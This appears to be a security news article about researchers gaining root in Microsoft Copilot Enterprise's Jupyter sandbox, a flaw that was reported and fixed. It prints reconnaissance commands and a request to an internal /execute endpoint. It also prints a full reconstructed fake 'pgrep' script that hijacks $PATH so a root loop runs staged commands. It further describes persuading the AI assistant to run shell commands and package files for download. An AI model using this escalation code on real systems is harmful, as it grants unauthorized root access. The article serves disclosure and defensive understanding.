Microsoft Copilot Rooted: Researchers Gain Unauthorized Root Access to Its Backend Container
A critical security vulnerability has been discovered in Microsoft Copilot Enterprise, allowing unauthorized users to gain root access to its backend container.
This vulnerability poses a significant risk, potentially allowing malicious users to manipulate system settings, access sensitive data, and compromise the application’s integrity.
The issue originated from an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. What began as a feature enhancement turned into a playground for exploitation, highlighting risks in AI-integrated systems.
The vulnerability was uncovered by Eye Security, whose researchers playfully likened interacting with Copilot to coaxing an unpredictable child. Using Jupyter’s % magic-command syntax, they executed arbitrary Linux commands as the ‘ubuntu’ user within a Miniconda environment.
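Eye Security has not published its exact prompts, so the following notebook-cell contents are only a sketch of the kind of commands that would exercise this behavior; the % and ! prefixes are Jupyter magics and shell escapes rather than plain Python:

```python
# IPython/Jupyter cell contents (illustrative assumptions, not the researchers' exact input).
%env          # dump the sandbox's environment variables
!whoami       # ran as the 'ubuntu' user in the researchers' tests
!uname -a     # fingerprint the kernel version
```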

Despite the user being in the sudo group, no sudo binary existed, adding an ironic layer to the setup. The sandbox mirrored ChatGPT’s model but boasted a newer kernel and Python 3.12, compared to ChatGPT’s 3.11 at the time.
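The sudo observation could be reproduced from inside the sandbox along these lines; the exact commands the researchers ran are an assumption:

```python
# Check group membership and whether a sudo binary is actually present.
import os
print(os.popen('id').read())          # groups listed include 'sudo'
print(os.popen('which sudo').read())  # prints nothing: no sudo binary installed
```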
Exploration revealed the sandbox’s core role in running Jupyter Notebooks alongside a Tika server. The container featured a limited link-local network interface with a /32 netmask, utilizing an OverlayFS filesystem linked to a /legion path on the host.
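A minimal sketch of how that layout could be observed from inside the container; the specific commands are assumptions, but the artifacts they surface are the ones described above:

```python
# Basic network and filesystem reconnaissance from within the sandbox.
import os
print(os.popen('ip addr').read())   # link-local interface with a /32 netmask
print(os.popen('mount').read())     # OverlayFS mount referencing /legion on the host
```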
Custom scripts resided in the /app directory, and after persistent commands, Copilot could be convinced to download files or tar folders, copying them to /mnt/data for external access via blob links on outlook.office[.]com.
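The staging pattern described above can be sketched as follows; the archive name is hypothetical, and /app is used as an example source directory:

```python
# Bundle a directory and drop the archive in /mnt/data, where Copilot exposed
# files as downloadable blob links on outlook.office[.]com.
import tarfile
with tarfile.open('/mnt/data/app.tar.gz', 'w:gz') as tar:
    tar.add('/app', arcname='app')
```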
A key binary, goclientapp in /app, acted as the container’s interface, running a web server on port 6000 that accepted POST requests to an /execute endpoint.
Simple JSON payloads, like {"code":"%env"}, triggered code execution in the Jupyter environment. An httpproxy binary hinted at future outbound traffic capabilities, though egress was disabled.
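Based on that description, an in-container request to goclientapp would look roughly like this; the loopback host and the response handling are assumptions:

```python
import requests

# POST a Jupyter command to goclientapp's /execute endpoint on port 6000.
resp = requests.post(
    'http://127.0.0.1:6000/execute',
    json={'code': '%env'},   # executed inside the Jupyter environment
)
print(resp.status_code, resp.text)
```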
The entrypoint.sh script, running as root, proved pivotal. It dropped privileges for most processes but launched keepAliveJupyterSvc.sh as root. A critical oversight in line 28 involved a pgrep command without a full path, executed in a ‘while true’ loop every two seconds.

This relied on the $PATH variable, which included writable directories like /app/miniconda/bin before /usr/bin, where the legitimate pgrep resides.
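The flaw is ordinary $PATH resolution: because line 28 invoked pgrep without an absolute path, the first matching executable in $PATH wins. A self-contained Python demonstration of the lookup order, using the directory names from the article:

```python
import os, shutil

# With a writable directory ahead of /usr/bin, any executable named 'pgrep'
# placed there shadows the real binary for every process using this PATH,
# including the root keep-alive loop.
os.environ['PATH'] = '/app/miniconda/bin:/usr/bin:/bin'
print(shutil.which('pgrep'))  # -> /app/miniconda/bin/pgrep, if such a file exists there
```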
Exploiting this, researchers crafted a malicious Python script disguised as pgrep in the writable path. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and wrote the output to /mnt/data/out.
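The script itself has not been published verbatim, so the following reconstruction is a sketch based on the behavior described; the final hand-off to the real pgrep is an added assumption so the keep-alive check still sees normal output:

```python
#!/app/miniconda/bin/python3
# Planted at /app/miniconda/bin/pgrep, where it shadows /usr/bin/pgrep.
# The root keep-alive loop invokes 'pgrep' every two seconds, so everything
# below runs with root privileges.
import os
import sys
import subprocess

IN_FILE = '/mnt/data/in'    # command staged by the unprivileged sandbox user
OUT_FILE = '/mnt/data/out'  # output readable by the unprivileged sandbox user

if os.path.exists(IN_FILE):
    with open(IN_FILE) as f:
        cmd = f.read().strip()
    with open(OUT_FILE, 'w') as out:
        out.write(os.popen(cmd).read())  # executes as root

# Assumption: delegate to the real pgrep so the caller sees expected behavior.
sys.exit(subprocess.call(['/usr/bin/pgrep'] + sys.argv[1:]))
```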

This granted root access and enabled full filesystem exploration, though no sensitive data or container-breakout paths were found, since known vulnerabilities had already been patched.
Eye Security reported the issue to Microsoft’s Security Response Center (MSRC) on April 18, 2025. Microsoft fixed the vulnerability by July 25 and classified it as moderate severity. No bounty was awarded, only an acknowledgment on Microsoft’s researcher page.
The researchers noted the exploit yielded “absolutely nothing” beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse.
This incident underscores the double-edged sword of AI sandboxes: innovative yet vulnerable to creative attacks. Microsoft has not publicly commented, but the swift fix demonstrates proactive security measures in evolving AI landscapes.